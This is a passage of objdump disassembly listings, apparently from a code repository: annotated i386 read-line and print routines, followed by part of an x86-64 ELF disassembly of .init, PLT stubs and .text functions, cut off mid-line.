369 | 80487d2: 80 39 0a cmpb $0xa,(%ecx) ; newline ends the line
370 | 80487d5: 74 05 je 80487dc
371 | 80487d7: 83 c1 01 add $0x1,%ecx
372 | 80487da: eb ea jmp 80487c6
373 | done:
374 | 80487dc: c6 01 00 movb $0x0,(%ecx) ; NUL-terminate, replacing the newline if one was read
375 | 80487df: 5e pop %esi
376 | 80487e0: 5a pop %edx
377 | 80487e1: 59 pop %ecx
378 | 80487e2: 5b pop %ebx
379 | 80487e3: c3 ret
380 |
381 | print(): ; print(str): writes a NUL-terminated string to fd 1, one byte per syscall
382 | 80487e4: 53 push %ebx
383 | 80487e5: 51 push %ecx
384 | 80487e6: 52 push %edx
385 | 80487e7: bb 01 00 00 00 mov $0x1,%ebx ; fd 1
386 | 80487ec: 8b 4c 24 10 mov 0x10(%esp),%ecx ; 1st arg: string pointer
387 | 80487f0: ba 01 00 00 00 mov $0x1,%edx ; count 1
388 | loop:
389 | 80487f5: 80 39 00 cmpb $0x0,(%ecx) ; stop at the terminating NUL
390 | 80487f8: 74 0c je 8048806
391 | 80487fa: b8 04 00 00 00 mov $0x4,%eax ; i386 Linux syscall number 4 = write
392 | 80487ff: cd 80 int $0x80 ; write(1, ecx, 1); the return value is not checked
393 | 8048801: 83 c1 01 add $0x1,%ecx
394 | 8048804: eb ef jmp 80487f5
395 |
396 | done:
397 | 8048806: 5a pop %edx
398 | 8048807: 59 pop %ecx
399 | 8048808: 5b pop %ebx
400 | 8048809: c3 ret
401 |
402 | __libc_csu_init:
403 | 804880a: 66 90 xchg %ax,%ax
404 | 804880c: 66 90 xchg %ax,%ax
405 | 804880e: 66 90 xchg %ax,%ax
406 | 8048810: 55 push %ebp
407 | 8048811: 57 push %edi
408 | 8048812: 31 ff xor %edi,%edi
409 | 8048814: 56 push %esi
410 | 8048815: 53 push %ebx
411 | 8048816: e8 75 fc ff ff call 8048490
412 | 804881b: 81 c3 e5 17 00 00 add $0x17e5,%ebx
413 | 8048821: 83 ec 1c sub $0x1c,%esp
414 | 8048824: 8b 6c 24 30 mov 0x30(%esp),%ebp
415 | 8048828: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi
416 | 804882e: e8 69 fb ff ff call 804839c
417 | 8048833: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax
418 | 8048839: 29 c6 sub %eax,%esi
419 | 804883b: c1 fe 02 sar $0x2,%esi
420 | 804883e: 85 f6 test %esi,%esi
421 | 8048840: 74 27 je
8048869 422 | 8048842: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 423 | 8048848: 8b 44 24 38 mov 0x38(%esp),%eax 424 | 804884c: 89 2c 24 mov %ebp,(%esp) 425 | 804884f: 89 44 24 08 mov %eax,0x8(%esp) 426 | 8048853: 8b 44 24 34 mov 0x34(%esp),%eax 427 | 8048857: 89 44 24 04 mov %eax,0x4(%esp) 428 | 804885b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) 429 | 8048862: 83 c7 01 add $0x1,%edi 430 | 8048865: 39 f7 cmp %esi,%edi 431 | 8048867: 75 df jne 8048848 432 | 8048869: 83 c4 1c add $0x1c,%esp 433 | 804886c: 5b pop %ebx 434 | 804886d: 5e pop %esi 435 | 804886e: 5f pop %edi 436 | 804886f: 5d pop %ebp 437 | 8048870: c3 ret 438 | 8048871: eb 0d jmp 8048880 439 | 8048873: 90 nop 440 | 8048874: 90 nop 441 | 8048875: 90 nop 442 | 8048876: 90 nop 443 | 8048877: 90 nop 444 | 8048878: 90 nop 445 | 8048879: 90 nop 446 | 804887a: 90 nop 447 | 804887b: 90 nop 448 | 804887c: 90 nop 449 | 804887d: 90 nop 450 | 804887e: 90 nop 451 | 804887f: 90 nop 452 | 8048880: f3 c3 repz ret 453 | 454 | Disassembly of section .fini: 455 | 456 | 08048884 <.fini>: 457 | 8048884: 53 push %ebx 458 | 8048885: 83 ec 08 sub $0x8,%esp 459 | 8048888: e8 03 fc ff ff call 8048490 460 | 804888d: 81 c3 73 17 00 00 add $0x1773,%ebx 461 | 8048893: 83 c4 08 add $0x8,%esp 462 | 8048896: 5b pop %ebx 463 | 8048897: c3 ret 464 | -------------------------------------------------------------------------------- /de.txt: -------------------------------------------------------------------------------- 1 | 2 | 62b6b6a8a19a89a3c33801520e0e8b58-de: file format elf64-x86-64 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0000000000400cf8 <.init>: 8 | 400cf8: 48 83 ec 08 sub $0x8,%rsp 9 | 400cfc: 48 8b 05 f5 22 20 00 mov 0x2022f5(%rip),%rax # 602ff8 10 | 400d03: 48 85 c0 test %rax,%rax 11 | 400d06: 74 05 je 400d0d 12 | 400d08: e8 53 00 00 00 callq 400d60 <__gmon_start__@plt> 13 | 400d0d: 48 83 c4 08 add $0x8,%rsp 14 | 400d11: c3 retq 15 | 16 | Disassembly of section .plt: 17 | 18 | 0000000000400d20 : 19 | 400d20: ff 35 e2 22 20 
00 pushq 0x2022e2(%rip) # 603008 20 | 400d26: ff 25 e4 22 20 00 jmpq *0x2022e4(%rip) # 603010 21 | 400d2c: 0f 1f 40 00 nopl 0x0(%rax) 22 | 23 | 0000000000400d30 : 24 | 400d30: ff 25 e2 22 20 00 jmpq *0x2022e2(%rip) # 603018 25 | 400d36: 68 00 00 00 00 pushq $0x0 26 | 400d3b: e9 e0 ff ff ff jmpq 400d20 27 | 28 | 0000000000400d40 : 29 | 400d40: ff 25 da 22 20 00 jmpq *0x2022da(%rip) # 603020 30 | 400d46: 68 01 00 00 00 pushq $0x1 31 | 400d4b: e9 d0 ff ff ff jmpq 400d20 32 | 33 | 0000000000400d50 : 34 | 400d50: ff 25 d2 22 20 00 jmpq *0x2022d2(%rip) # 603028 35 | 400d56: 68 02 00 00 00 pushq $0x2 36 | 400d5b: e9 c0 ff ff ff jmpq 400d20 37 | 38 | 0000000000400d60 <__gmon_start__@plt>: 39 | 400d60: ff 25 ca 22 20 00 jmpq *0x2022ca(%rip) # 603030 40 | 400d66: 68 03 00 00 00 pushq $0x3 41 | 400d6b: e9 b0 ff ff ff jmpq 400d20 42 | 43 | 0000000000400d70 : 44 | 400d70: ff 25 c2 22 20 00 jmpq *0x2022c2(%rip) # 603038 45 | 400d76: 68 04 00 00 00 pushq $0x4 46 | 400d7b: e9 a0 ff ff ff jmpq 400d20 47 | 48 | 0000000000400d80 : 49 | 400d80: ff 25 ba 22 20 00 jmpq *0x2022ba(%rip) # 603040 50 | 400d86: 68 05 00 00 00 pushq $0x5 51 | 400d8b: e9 90 ff ff ff jmpq 400d20 52 | 53 | 0000000000400d90 : 54 | 400d90: ff 25 b2 22 20 00 jmpq *0x2022b2(%rip) # 603048 55 | 400d96: 68 06 00 00 00 pushq $0x6 56 | 400d9b: e9 80 ff ff ff jmpq 400d20 57 | 58 | 0000000000400da0 : 59 | 400da0: ff 25 aa 22 20 00 jmpq *0x2022aa(%rip) # 603050 60 | 400da6: 68 07 00 00 00 pushq $0x7 61 | 400dab: e9 70 ff ff ff jmpq 400d20 62 | 63 | 0000000000400db0 : 64 | 400db0: ff 25 a2 22 20 00 jmpq *0x2022a2(%rip) # 603058 65 | 400db6: 68 08 00 00 00 pushq $0x8 66 | 400dbb: e9 60 ff ff ff jmpq 400d20 67 | 68 | 0000000000400dc0 : 69 | 400dc0: ff 25 9a 22 20 00 jmpq *0x20229a(%rip) # 603060 70 | 400dc6: 68 09 00 00 00 pushq $0x9 71 | 400dcb: e9 50 ff ff ff jmpq 400d20 72 | 73 | 0000000000400dd0 <__libc_start_main@plt>: 74 | 400dd0: ff 25 92 22 20 00 jmpq *0x202292(%rip) # 603068 75 | 400dd6: 68 0a 00 00 00 pushq $0xa 76 
| 400ddb: e9 40 ff ff ff jmpq 400d20 77 | 78 | 0000000000400de0 : 79 | 400de0: ff 25 8a 22 20 00 jmpq *0x20228a(%rip) # 603070 80 | 400de6: 68 0b 00 00 00 pushq $0xb 81 | 400deb: e9 30 ff ff ff jmpq 400d20 82 | 83 | 0000000000400df0 : 84 | 400df0: ff 25 82 22 20 00 jmpq *0x202282(%rip) # 603078 85 | 400df6: 68 0c 00 00 00 pushq $0xc 86 | 400dfb: e9 20 ff ff ff jmpq 400d20 87 | 88 | 0000000000400e00 : 89 | 400e00: ff 25 7a 22 20 00 jmpq *0x20227a(%rip) # 603080 90 | 400e06: 68 0d 00 00 00 pushq $0xd 91 | 400e0b: e9 10 ff ff ff jmpq 400d20 92 | 93 | 0000000000400e10 : 94 | 400e10: ff 25 72 22 20 00 jmpq *0x202272(%rip) # 603088 95 | 400e16: 68 0e 00 00 00 pushq $0xe 96 | 400e1b: e9 00 ff ff ff jmpq 400d20 97 | 98 | 0000000000400e20 : 99 | 400e20: ff 25 6a 22 20 00 jmpq *0x20226a(%rip) # 603090 100 | 400e26: 68 0f 00 00 00 pushq $0xf 101 | 400e2b: e9 f0 fe ff ff jmpq 400d20 102 | 103 | 0000000000400e30 <__xstat@plt>: 104 | 400e30: ff 25 62 22 20 00 jmpq *0x202262(%rip) # 603098 105 | 400e36: 68 10 00 00 00 pushq $0x10 106 | 400e3b: e9 e0 fe ff ff jmpq 400d20 107 | 108 | 0000000000400e40 : 109 | 400e40: ff 25 5a 22 20 00 jmpq *0x20225a(%rip) # 6030a0 110 | 400e46: 68 11 00 00 00 pushq $0x11 111 | 400e4b: e9 d0 fe ff ff jmpq 400d20 112 | 113 | 0000000000400e50 : 114 | 400e50: ff 25 52 22 20 00 jmpq *0x202252(%rip) # 6030a8 115 | 400e56: 68 12 00 00 00 pushq $0x12 116 | 400e5b: e9 c0 fe ff ff jmpq 400d20 117 | 118 | 0000000000400e60 : 119 | 400e60: ff 25 4a 22 20 00 jmpq *0x20224a(%rip) # 6030b0 120 | 400e66: 68 13 00 00 00 pushq $0x13 121 | 400e6b: e9 b0 fe ff ff jmpq 400d20 122 | 123 | 0000000000400e70 : 124 | 400e70: ff 25 42 22 20 00 jmpq *0x202242(%rip) # 6030b8 125 | 400e76: 68 14 00 00 00 pushq $0x14 126 | 400e7b: e9 a0 fe ff ff jmpq 400d20 127 | 128 | 0000000000400e80 : 129 | 400e80: ff 25 3a 22 20 00 jmpq *0x20223a(%rip) # 6030c0 130 | 400e86: 68 15 00 00 00 pushq $0x15 131 | 400e8b: e9 90 fe ff ff jmpq 400d20 132 | 133 | 0000000000400e90 : 134 | 400e90: ff 25 
32 22 20 00 jmpq *0x202232(%rip) # 6030c8 135 | 400e96: 68 16 00 00 00 pushq $0x16 136 | 400e9b: e9 80 fe ff ff jmpq 400d20 137 | 138 | 0000000000400ea0 <__stack_chk_fail@plt>: 139 | 400ea0: ff 25 2a 22 20 00 jmpq *0x20222a(%rip) # 6030d0 140 | 400ea6: 68 17 00 00 00 pushq $0x17 141 | 400eab: e9 70 fe ff ff jmpq 400d20 142 | 143 | 0000000000400eb0 : 144 | 400eb0: ff 25 22 22 20 00 jmpq *0x202222(%rip) # 6030d8 145 | 400eb6: 68 18 00 00 00 pushq $0x18 146 | 400ebb: e9 60 fe ff ff jmpq 400d20 147 | 148 | 0000000000400ec0 : 149 | 400ec0: ff 25 1a 22 20 00 jmpq *0x20221a(%rip) # 6030e0 150 | 400ec6: 68 19 00 00 00 pushq $0x19 151 | 400ecb: e9 50 fe ff ff jmpq 400d20 152 | 153 | 0000000000400ed0 : 154 | 400ed0: ff 25 12 22 20 00 jmpq *0x202212(%rip) # 6030e8 155 | 400ed6: 68 1a 00 00 00 pushq $0x1a 156 | 400edb: e9 40 fe ff ff jmpq 400d20 157 | 158 | 0000000000400ee0 : 159 | 400ee0: ff 25 0a 22 20 00 jmpq *0x20220a(%rip) # 6030f0 160 | 400ee6: 68 1b 00 00 00 pushq $0x1b 161 | 400eeb: e9 30 fe ff ff jmpq 400d20 162 | 163 | 0000000000400ef0 : 164 | 400ef0: ff 25 02 22 20 00 jmpq *0x202202(%rip) # 6030f8 165 | 400ef6: 68 1c 00 00 00 pushq $0x1c 166 | 400efb: e9 20 fe ff ff jmpq 400d20 167 | 168 | 0000000000400f00 : 169 | 400f00: ff 25 fa 21 20 00 jmpq *0x2021fa(%rip) # 603100 170 | 400f06: 68 1d 00 00 00 pushq $0x1d 171 | 400f0b: e9 10 fe ff ff jmpq 400d20 172 | 173 | 0000000000400f10 : 174 | 400f10: ff 25 f2 21 20 00 jmpq *0x2021f2(%rip) # 603108 175 | 400f16: 68 1e 00 00 00 pushq $0x1e 176 | 400f1b: e9 00 fe ff ff jmpq 400d20 177 | 178 | 0000000000400f20 : 179 | 400f20: ff 25 ea 21 20 00 jmpq *0x2021ea(%rip) # 603110 180 | 400f26: 68 1f 00 00 00 pushq $0x1f 181 | 400f2b: e9 f0 fd ff ff jmpq 400d20 182 | 183 | 0000000000400f30 : 184 | 400f30: ff 25 e2 21 20 00 jmpq *0x2021e2(%rip) # 603118 185 | 400f36: 68 20 00 00 00 pushq $0x20 186 | 400f3b: e9 e0 fd ff ff jmpq 400d20 187 | 188 | 0000000000400f40 : 189 | 400f40: ff 25 da 21 20 00 jmpq *0x2021da(%rip) # 603120 190 | 
400f46: 68 21 00 00 00 pushq $0x21 191 | 400f4b: e9 d0 fd ff ff jmpq 400d20 192 | 193 | 0000000000400f50 : 194 | 400f50: ff 25 d2 21 20 00 jmpq *0x2021d2(%rip) # 603128 195 | 400f56: 68 22 00 00 00 pushq $0x22 196 | 400f5b: e9 c0 fd ff ff jmpq 400d20 197 | 198 | Disassembly of section .text: 199 | 200 | 0000000000400f60 <.text>: 201 | 400f60: 31 ed xor %ebp,%ebp 202 | 400f62: 49 89 d1 mov %rdx,%r9 203 | 400f65: 5e pop %rsi 204 | 400f66: 48 89 e2 mov %rsp,%rdx 205 | 400f69: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp 206 | 400f6d: 50 push %rax 207 | 400f6e: 54 push %rsp 208 | 400f6f: 49 c7 c0 e0 1e 40 00 mov $0x401ee0,%r8 209 | 400f76: 48 c7 c1 70 1e 40 00 mov $0x401e70,%rcx 210 | 400f7d: 48 c7 c7 40 1c 40 00 mov $0x401c40,%rdi 211 | 400f84: e8 47 fe ff ff callq 400dd0 <__libc_start_main@plt> 212 | 400f89: f4 hlt 213 | 400f8a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 214 | 400f90: b8 47 31 60 00 mov $0x603147,%eax 215 | 400f95: 55 push %rbp 216 | 400f96: 48 2d 40 31 60 00 sub $0x603140,%rax 217 | 400f9c: 48 83 f8 0e cmp $0xe,%rax 218 | 400fa0: 48 89 e5 mov %rsp,%rbp 219 | 400fa3: 77 02 ja 400fa7 220 | 400fa5: 5d pop %rbp 221 | 400fa6: c3 retq 222 | 400fa7: b8 00 00 00 00 mov $0x0,%eax 223 | 400fac: 48 85 c0 test %rax,%rax 224 | 400faf: 74 f4 je 400fa5 225 | 400fb1: 5d pop %rbp 226 | 400fb2: bf 40 31 60 00 mov $0x603140,%edi 227 | 400fb7: ff e0 jmpq *%rax 228 | 400fb9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 229 | 400fc0: b8 40 31 60 00 mov $0x603140,%eax 230 | 400fc5: 55 push %rbp 231 | 400fc6: 48 2d 40 31 60 00 sub $0x603140,%rax 232 | 400fcc: 48 c1 f8 03 sar $0x3,%rax 233 | 400fd0: 48 89 e5 mov %rsp,%rbp 234 | 400fd3: 48 89 c2 mov %rax,%rdx 235 | 400fd6: 48 c1 ea 3f shr $0x3f,%rdx 236 | 400fda: 48 01 d0 add %rdx,%rax 237 | 400fdd: 48 d1 f8 sar %rax 238 | 400fe0: 75 02 jne 400fe4 239 | 400fe2: 5d pop %rbp 240 | 400fe3: c3 retq 241 | 400fe4: ba 00 00 00 00 mov $0x0,%edx 242 | 400fe9: 48 85 d2 test %rdx,%rdx 243 | 400fec: 74 f4 je 400fe2 244 | 400fee: 5d pop %rbp 245 | 
400fef: 48 89 c6 mov %rax,%rsi 246 | 400ff2: bf 40 31 60 00 mov $0x603140,%edi 247 | 400ff7: ff e2 jmpq *%rdx 248 | 400ff9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 249 | 401000: 80 3d 51 21 20 00 00 cmpb $0x0,0x202151(%rip) # 603158 250 | 401007: 75 11 jne 40101a 251 | 401009: 55 push %rbp 252 | 40100a: 48 89 e5 mov %rsp,%rbp 253 | 40100d: e8 7e ff ff ff callq 400f90 254 | 401012: 5d pop %rbp 255 | 401013: c6 05 3e 21 20 00 01 movb $0x1,0x20213e(%rip) # 603158 256 | 40101a: f3 c3 repz retq 257 | 40101c: 0f 1f 40 00 nopl 0x0(%rax) 258 | 401020: 48 83 3d d8 1d 20 00 cmpq $0x0,0x201dd8(%rip) # 602e00 259 | 401027: 00 260 | 401028: 74 1e je 401048 261 | 40102a: b8 00 00 00 00 mov $0x0,%eax 262 | 40102f: 48 85 c0 test %rax,%rax 263 | 401032: 74 14 je 401048 264 | 401034: 55 push %rbp 265 | 401035: bf 00 2e 60 00 mov $0x602e00,%edi 266 | 40103a: 48 89 e5 mov %rsp,%rbp 267 | 40103d: ff d0 callq *%rax 268 | 40103f: 5d pop %rbp 269 | 401040: e9 7b ff ff ff jmpq 400fc0 270 | 401045: 0f 1f 00 nopl (%rax) 271 | 401048: e9 73 ff ff ff jmpq 400fc0 272 | 40104d: 0f 1f 00 nopl (%rax) 273 | 401050: 55 push %rbp 274 | 401051: 53 push %rbx 275 | 401052: 50 push %rax 276 | 401053: 48 89 f3 mov %rsi,%rbx 277 | 401056: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 278 | 40105d: 00 00 279 | 40105f: 48 89 04 24 mov %rax,(%rsp) 280 | 401063: 31 f6 xor %esi,%esi 281 | 401065: 31 c0 xor %eax,%eax 282 | 401067: e8 d4 fe ff ff callq 400f40 283 | 40106c: 89 c5 mov %eax,%ebp 284 | 40106e: 85 ed test %ebp,%ebp 285 | 401070: 78 59 js 4010cb 286 | 401072: ba 17 00 00 00 mov $0x17,%edx 287 | 401077: 89 ef mov %ebp,%edi 288 | 401079: 48 89 de mov %rbx,%rsi 289 | 40107c: e8 2f fd ff ff callq 400db0 290 | 401081: 48 83 f8 17 cmp $0x17,%rax 291 | 401085: 75 4b jne 4010d2 292 | 401087: 89 ef mov %ebp,%edi 293 | 401089: e8 c2 fc ff ff callq 400d50 294 | 40108e: 31 c0 xor %eax,%eax 295 | 401090: 8a 0c 03 mov (%rbx,%rax,1),%cl 296 | 401093: 80 c1 bf add $0xbf,%cl 297 | 401096: 80 f9 1a cmp $0x1a,%cl 298 | 401099: 73 
53 jae 4010ee 299 | 40109b: 48 ff c0 inc %rax 300 | 40109e: 83 f8 16 cmp $0x16,%eax 301 | 4010a1: 7e ed jle 401090 302 | 4010a3: e8 98 fc ff ff callq 400d40 303 | 4010a8: 89 c3 mov %eax,%ebx 304 | 4010aa: e8 11 fe ff ff callq 400ec0 305 | 4010af: 89 c5 mov %eax,%ebp 306 | 4010b1: 89 df mov %ebx,%edi 307 | 4010b3: 89 de mov %ebx,%esi 308 | 4010b5: 89 da mov %ebx,%edx 309 | 4010b7: e8 d4 fd ff ff callq 400e90 310 | 4010bc: 89 ef mov %ebp,%edi 311 | 4010be: 89 ee mov %ebp,%esi 312 | 4010c0: 89 ea mov %ebp,%edx 313 | 4010c2: e8 29 fd ff ff callq 400df0 314 | 4010c7: 31 c0 xor %eax,%eax 315 | 4010c9: eb 40 jmp 40110b 316 | 4010cb: bf f4 1e 40 00 mov $0x401ef4,%edi 317 | 4010d0: eb 2f jmp 401101 318 | 4010d2: 0f 57 c0 xorps %xmm0,%xmm0 319 | 4010d5: 0f 11 03 movups %xmm0,(%rbx) 320 | 4010d8: 48 c7 43 0f 00 00 00 movq $0x0,0xf(%rbx) 321 | 4010df: 00 322 | 4010e0: 89 ef mov %ebp,%edi 323 | 4010e2: e8 69 fc ff ff callq 400d50 324 | 4010e7: bf fc 1e 40 00 mov $0x401efc,%edi 325 | 4010ec: eb 13 jmp 401101 326 | 4010ee: 0f 57 c0 xorps %xmm0,%xmm0 327 | 4010f1: 0f 11 03 movups %xmm0,(%rbx) 328 | 4010f4: 48 c7 43 0f 00 00 00 movq $0x0,0xf(%rbx) 329 | 4010fb: 00 330 | 4010fc: bf 12 1f 40 00 mov $0x401f12,%edi 331 | 401101: e8 6a fc ff ff callq 400d70 332 | 401106: b8 ff ff ff ff mov $0xffffffff,%eax 333 | 40110b: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 334 | 401112: 00 00 335 | 401114: 48 3b 0c 24 cmp (%rsp),%rcx 336 | 401118: 75 07 jne 401121 337 | 40111a: 48 83 c4 08 add $0x8,%rsp 338 | 40111e: 5b pop %rbx 339 | 40111f: 5d pop %rbp 340 | 401120: c3 retq 341 | 401121: e8 7a fd ff ff callq 400ea0 <__stack_chk_fail@plt> 342 | 401126: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 343 | 40112d: 00 00 00 344 | 401130: 55 push %rbp 345 | 401131: 41 57 push %r15 346 | 401133: 41 56 push %r14 347 | 401135: 41 55 push %r13 348 | 401137: 41 54 push %r12 349 | 401139: 53 push %rbx 350 | 40113a: 48 83 ec 18 sub $0x18,%rsp 351 | 40113e: 49 89 cd mov %rcx,%r13 352 | 401141: 49 89 d4 mov 
%rdx,%r12 353 | 401144: 49 89 f7 mov %rsi,%r15 354 | 401147: 49 89 fe mov %rdi,%r14 355 | 40114a: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 356 | 401151: 00 00 357 | 401153: 48 89 44 24 10 mov %rax,0x10(%rsp) 358 | 401158: bf 28 1f 40 00 mov $0x401f28,%edi 359 | 40115d: 31 f6 xor %esi,%esi 360 | 40115f: 31 c0 xor %eax,%eax 361 | 401161: e8 da fd ff ff callq 400f40 362 | 401166: 89 c5 mov %eax,%ebp 363 | 401168: 85 ed test %ebp,%ebp 364 | 40116a: 78 5b js 4011c7 365 | 40116c: ba 08 00 00 00 mov $0x8,%edx 366 | 401171: 89 ef mov %ebp,%edi 367 | 401173: 4c 89 ee mov %r13,%rsi 368 | 401176: e8 35 fc ff ff callq 400db0 369 | 40117b: 48 89 c3 mov %rax,%rbx 370 | 40117e: 89 ef mov %ebp,%edi 371 | 401180: e8 cb fb ff ff callq 400d50 372 | 401185: 48 83 fb 08 cmp $0x8,%rbx 373 | 401189: 75 3c jne 4011c7 374 | 40118b: e8 70 fd ff ff callq 400f00 375 | 401190: 48 89 c3 mov %rax,%rbx 376 | 401193: e8 78 fd ff ff callq 400f10 377 | 401198: 4c 89 64 24 08 mov %r12,0x8(%rsp) 378 | 40119d: 4c 89 3c 24 mov %r15,(%rsp) 379 | 4011a1: 41 b8 17 00 00 00 mov $0x17,%r8d 380 | 4011a7: 41 b9 07 00 00 00 mov $0x7,%r9d 381 | 4011ad: 48 89 df mov %rbx,%rdi 382 | 4011b0: 48 89 c6 mov %rax,%rsi 383 | 4011b3: 4c 89 ea mov %r13,%rdx 384 | 4011b6: 4c 89 f1 mov %r14,%rcx 385 | 4011b9: e8 d2 fb ff ff callq 400d90 386 | 4011be: 89 c1 mov %eax,%ecx 387 | 4011c0: 31 c0 xor %eax,%eax 388 | 4011c2: 83 f9 20 cmp $0x20,%ecx 389 | 4011c5: 74 0f je 4011d6 390 | 4011c7: bf f4 1e 40 00 mov $0x401ef4,%edi 391 | 4011cc: e8 9f fb ff ff callq 400d70 392 | 4011d1: b8 ff ff ff ff mov $0xffffffff,%eax 393 | 4011d6: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 394 | 4011dd: 00 00 395 | 4011df: 48 3b 4c 24 10 cmp 0x10(%rsp),%rcx 396 | 4011e4: 75 0f jne 4011f5 397 | 4011e6: 48 83 c4 18 add $0x18,%rsp 398 | 4011ea: 5b pop %rbx 399 | 4011eb: 41 5c pop %r12 400 | 4011ed: 41 5d pop %r13 401 | 4011ef: 41 5e pop %r14 402 | 4011f1: 41 5f pop %r15 403 | 4011f3: 5d pop %rbp 404 | 4011f4: c3 retq 405 | 4011f5: e8 a6 fc ff ff callq 400ea0 
<__stack_chk_fail@plt> 406 | 4011fa: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 407 | 401200: 41 57 push %r15 408 | 401202: 41 56 push %r14 409 | 401204: 41 55 push %r13 410 | 401206: 41 54 push %r12 411 | 401208: 53 push %rbx 412 | 401209: 48 83 ec 20 sub $0x20,%rsp 413 | 40120d: 48 89 cb mov %rcx,%rbx 414 | 401210: 49 89 d6 mov %rdx,%r14 415 | 401213: 49 89 f7 mov %rsi,%r15 416 | 401216: 49 89 fc mov %rdi,%r12 417 | 401219: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 418 | 401220: 00 00 419 | 401222: 48 89 44 24 18 mov %rax,0x18(%rsp) 420 | 401227: e8 d4 fc ff ff callq 400f00 421 | 40122c: 49 89 c5 mov %rax,%r13 422 | 40122f: e8 dc fc ff ff callq 400f10 423 | 401234: 48 89 5c 24 08 mov %rbx,0x8(%rsp) 424 | 401239: 4c 89 34 24 mov %r14,(%rsp) 425 | 40123d: 41 b8 17 00 00 00 mov $0x17,%r8d 426 | 401243: 41 b9 07 00 00 00 mov $0x7,%r9d 427 | 401249: 4c 89 ef mov %r13,%rdi 428 | 40124c: 48 89 c6 mov %rax,%rsi 429 | 40124f: 4c 89 fa mov %r15,%rdx 430 | 401252: 4c 89 e1 mov %r12,%rcx 431 | 401255: e8 36 fb ff ff callq 400d90 432 | 40125a: 89 c1 mov %eax,%ecx 433 | 40125c: 31 c0 xor %eax,%eax 434 | 40125e: 83 f9 20 cmp $0x20,%ecx 435 | 401261: 74 0f je 401272 436 | 401263: bf f4 1e 40 00 mov $0x401ef4,%edi 437 | 401268: e8 03 fb ff ff callq 400d70 438 | 40126d: b8 ff ff ff ff mov $0xffffffff,%eax 439 | 401272: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 440 | 401279: 00 00 441 | 40127b: 48 3b 4c 24 18 cmp 0x18(%rsp),%rcx 442 | 401280: 75 0e jne 401290 443 | 401282: 48 83 c4 20 add $0x20,%rsp 444 | 401286: 5b pop %rbx 445 | 401287: 41 5c pop %r12 446 | 401289: 41 5d pop %r13 447 | 40128b: 41 5e pop %r14 448 | 40128d: 41 5f pop %r15 449 | 40128f: c3 retq 450 | 401290: e8 0b fc ff ff callq 400ea0 <__stack_chk_fail@plt> 451 | 401295: 66 66 2e 0f 1f 84 00 data16 nopw %cs:0x0(%rax,%rax,1) 452 | 40129c: 00 00 00 00 453 | 4012a0: 48 83 ec 38 sub $0x38,%rsp 454 | 4012a4: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 455 | 4012ab: 00 00 456 | 4012ad: 48 89 44 24 30 mov %rax,0x30(%rsp) 457 | 4012b2: 
48 8b 47 0f mov 0xf(%rdi),%rax 458 | 4012b6: 48 89 44 24 0f mov %rax,0xf(%rsp) 459 | 4012bb: 0f 10 07 movups (%rdi),%xmm0 460 | 4012be: 0f 29 04 24 movaps %xmm0,(%rsp) 461 | 4012c2: 48 8b 06 mov (%rsi),%rax 462 | 4012c5: 48 89 44 24 17 mov %rax,0x17(%rsp) 463 | 4012ca: 48 8d 3c 24 lea (%rsp),%rdi 464 | 4012ce: be 1f 00 00 00 mov $0x1f,%esi 465 | 4012d3: e8 98 fb ff ff callq 400e70 466 | 4012d8: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 467 | 4012df: 00 00 468 | 4012e1: 48 3b 44 24 30 cmp 0x30(%rsp),%rax 469 | 4012e6: 75 07 jne 4012ef 470 | 4012e8: 31 c0 xor %eax,%eax 471 | 4012ea: 48 83 c4 38 add $0x38,%rsp 472 | 4012ee: c3 retq 473 | 4012ef: e8 ac fb ff ff callq 400ea0 <__stack_chk_fail@plt> 474 | 4012f4: 66 66 66 2e 0f 1f 84 data16 data16 nopw %cs:0x0(%rax,%rax,1) 475 | 4012fb: 00 00 00 00 00 476 | 401300: 55 push %rbp 477 | 401301: 41 57 push %r15 478 | 401303: 41 56 push %r14 479 | 401305: 41 55 push %r13 480 | 401307: 41 54 push %r12 481 | 401309: 53 push %rbx 482 | 40130a: 48 81 ec b8 01 00 00 sub $0x1b8,%rsp 483 | 401311: 48 89 d5 mov %rdx,%rbp 484 | 401314: 49 89 f6 mov %rsi,%r14 485 | 401317: 48 89 fb mov %rdi,%rbx 486 | 40131a: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 487 | 401321: 00 00 488 | 401323: 48 89 84 24 b0 01 00 mov %rax,0x1b0(%rsp) 489 | 40132a: 00 490 | 40132b: 8d 41 ff lea -0x1(%rcx),%eax 491 | 40132e: 3d 6f 01 00 00 cmp $0x16f,%eax 492 | 401333: 76 14 jbe 401349 493 | 401335: bf 35 1f 40 00 mov $0x401f35,%edi 494 | 40133a: e8 31 fa ff ff callq 400d70 495 | 40133f: b8 ff ff ff ff mov $0xffffffff,%eax 496 | 401344: e9 c9 03 00 00 jmpq 401712 497 | 401349: 81 f9 6f 01 00 00 cmp $0x16f,%ecx 498 | 40134f: 7f 17 jg 401368 499 | 401351: 48 63 f9 movslq %ecx,%rdi 500 | 401354: 48 01 ef add %rbp,%rdi 501 | 401357: ba 6f 01 00 00 mov $0x16f,%edx 502 | 40135c: 29 ca sub %ecx,%edx 503 | 40135e: 48 ff c2 inc %rdx 504 | 401361: 31 f6 xor %esi,%esi 505 | 401363: e8 c8 f9 ff ff callq 400d30 506 | 401368: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 507 | 40136d: e8 2e fa 
